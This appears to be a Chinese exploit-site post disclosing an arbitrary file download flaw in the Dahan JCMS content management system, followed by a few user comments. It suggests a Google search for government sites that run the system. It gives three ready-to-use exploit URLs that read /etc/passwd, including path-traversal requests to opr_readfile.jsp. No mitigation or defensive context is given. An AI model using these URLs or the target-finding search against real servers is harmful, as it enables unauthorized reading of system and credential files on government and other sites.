漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

大汉版通JCMS内容管理系统任意文件下载漏洞

用这系统政府门户网站居多,上谷歌inurl:gov.cn/jcms一下,使用量不是很大.多处任意文件下载,影响版本未知,大概都影响吧。

1. http://target/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt

要得到网站路径,访问:http://target/jcms/m_5_9/sendreport/,然后生成报表就看得到了。

2. http://target/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd

3. http://target/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 大汉版通JCMS内容管理系统任意文件下载漏洞

评论 3

  1. 测试了几个成功率不行呀!

    独自等待 2013-12-24    回复
  2. 我是来膜拜疯子大牛,副站长!

    ooxx 2013-12-12    回复
    • 感谢您对本站的创始人的支持。对了,他还是单身哦~机会不多机会不多

      0day5 2013-12-12    回复